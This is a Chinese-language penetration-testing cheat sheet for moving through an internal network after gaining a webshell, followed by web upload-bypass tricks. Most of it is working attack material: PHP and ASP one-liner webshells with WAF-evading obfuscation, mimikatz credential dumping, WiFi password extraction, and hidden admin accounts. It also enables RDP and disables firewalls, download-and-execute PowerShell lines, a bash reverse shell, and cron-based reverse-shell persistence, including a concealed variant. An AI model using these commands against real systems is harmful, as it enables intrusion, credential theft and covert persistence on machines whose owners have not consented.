史上最强内⽹渗透知识点总结获取 webshell 进内⽹测试主站，搜 wooyun 历史洞未发现历史洞，github, svn, ⽬录扫描未发现敏感信息, ⽆域传送，端⼝只开了80端⼝，找到后台地址，想爆破后台，验证码后台验证，⼀次性，⽤ ocr 识别，找账号，通过 google，baidu，bing 等搜索，相关邮箱，域名等加常⽤密码组成字典，发现⽤户⼿册，找账号，发现未打码信息，和默认密码，试下登陆成功，找后台，上传有 dog，⽤含有⼀句话的 txt ⽂件`<?php eval($_POST['cmd']);?>`打包为 zip，php ⽂件`<?php include 'phar://1.zip/1.txt';?>`即可，c ⼑被拦，修改 config.ini ⽂件`php_make @eval(call_user_func_array(base64_decode,array($_POST[action])));`⽤回调函数，第⼀个为函数名，⼆个为传的参数前期信息收集query user || qwinsta 查看当前在线⽤户net user 查看本机⽤户net user /domain 查看域⽤户net view & net group "domain computers" /domain 查看当前域计算机列表第⼆个查的更多net view /domain 查看有⼏个域net view \\\\dc 查看 dc 域内共享⽂件net group /domain 查看域⾥⾯的组net group "domain admins" /domain 查看域管net localgroup administrators /domain /这个也是查域管，是升级为域控时，本地账户也成为域管net group "domain controllers" /domain 域控net time /domainnet config workstation 当前登录域 - 计算机名 - ⽤户名net use \\\\域控(如) password /user:\username 相当于这个帐号登录域内主机，可访问资源ipconfigsysteminfotasklist /svctasklist /S ip /U domain\username /P /V 查看远程计算机 tasklistnet localgroup administrators && whoami 查看当前是不是属于管理组netstat -anonltest /dclist:xx 查看域控whoami /all 查看 Mandatory Label uac 级别和 sid 号net sessoin 查看远程连接 session (需要管理权限)net share 共享⽬录cmdkey /l 查看保存登陆凭证echo %logonserver% 查看登陆域spn –l administrator spn 记录set 环境变量dsquery server - 查找⽬录中的 AD DC/LDS 实例dsquery user - 查找⽬录中的⽤户dsquery computer 查询所有计算机名称 windows 2003dir /s *.exe 查找指定⽬录下及⼦⽬录下没隐藏⽂件arp -a发现远程登录密码等密码 netpass.exe 下载地址：mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit wifi 密码：netsh wlan show profile 查处 wifi 名netsh wlan show profile WiFi-name key=clear 获取对应 wifi 的密码ie 代理reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings" /v ProxyServerreg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"pac 代理reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings" /v AutoConfigURL //引⼦ t0stmailpowershell-nishang其他常⽤命令ping icmp 连通性nslookup vps-ip dns 连通性dig @vps-ip curl vps:8080 http 连通性tracertfuser -nv tcp 80 查看端⼝ pidrdesktop -u username ip linux 连接 win 远程桌⾯ (有可能不成功)where file win 查找⽂件是否存在找路径，Linux 下使⽤命令 find -name *.jsp 来查找，Windows 下，使⽤ for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %inetstat -apn | grep 8888 kill -9 PID 查看端⼝并 kill远程登录内⽹主机判断是内⽹，还是外⽹，内⽹转发到 vpsnetstat -ano 没有开启 3389 端⼝,复查下tasklist /svc,查 svchost.exe 对应的 TermService 的 pid,看 netstat 相等的 pid 即 3389 端⼝.在主机上添加账号net user admin1 admin1 /add & net localgroup administrators admin1 /add如不允许远程连接，修改注册表REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d00000000 /fREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f如果系统未配置过远程桌⾯服务，第⼀次开启时还需要添加防⽕墙规则，允许 3389 端⼝，命令如下:netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow关闭防⽕墙netsh firewall set opmode mode=disable3389user ⽆法添加:**隐藏 win 账户**开启 sys 权限 cmd:IEX(New-ObjectNet.WebClient).DownloadString('https:///PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess 'cmd.exe' -Username 'nt authority\system'add user 并隐藏:IEX(New-Object Net.WebClient).DownloadString('https:///3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')win server 有密码强度要求，改为更复杂密码即可:渗透技巧——Windows 系统的帐户隐藏windows 的 RDP 连接记录:linux bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1`bash -i` 交互的 shell`&` 标准错误输出到标准输出`/dev/tcp/10.0.0.1/8080` 建⽴ socket ip port`0>&1` 标准输⼊到标准输出(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/IP/port;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -猥琐版(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab forwhoami%100c\n")|crontab -详细介绍ngrok-backdoorGrok-backdoor 是⼀个简单的基于 python 的后门，它使⽤ Ngrok 隧道进⾏通信。

WEB下渗透测试经验技巧（全）整理的：上传漏洞拿shell：1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马，拿到shell.2.就是在上传时在后缀后⾯加空格或者加⼏点，也许也会有惊奇的发现。

例：*.asp ,*.asp..。

3.利⽤双重扩展名上传例如：*.jpg.asa格式(也可以配上第⼆点⼀起利⽤)。

4.gif⽂件头欺骗5.同名重复上传也很OK。

：⼊侵渗透中⽤到的命令，语法：set,systeminfo,ipconfig,ping,利⽤这些命令可以收到⽐较多的系统信息tasklist /svc 查看服务对应的pidnetstat -ano，netstat -abnvfsutil.exe fsinfo drives 列出全部盘符dir d:\*conn*.* /s 找数据库连接⽂件telnet 218.25.88.234 3389 对外部是否开放了这个端⼝echo ^<%execute(request(“cmd”))%^> >>e:\k\X.asp 写⼀句话到e:\k\⽬录,密码为cmd.type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp 传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp注册表敏感信息：HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mysql 注册表位置HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 华众主机位置HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\ serv-u 位置HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端⼝HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters 1433端⼝HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\ 服务器ftp路径服务器⽇志⽂件物理路径：安全⽇志⽂件：%systemroot%\system32\config \SecEvent.EVT系统⽇志⽂件：%systemroot%\system32\config \SysEvent.EVT应⽤程序⽇志⽂件：%systemroot%\system32\config \AppEvent.EVTFTP连接⽇志和HTTPD事务⽇志：systemroot% \system32\LogFiles\，下⾯还有⼦⽂件夹，分别对应该FTP和Web服务的⽇志，其对应的后缀名为.Log。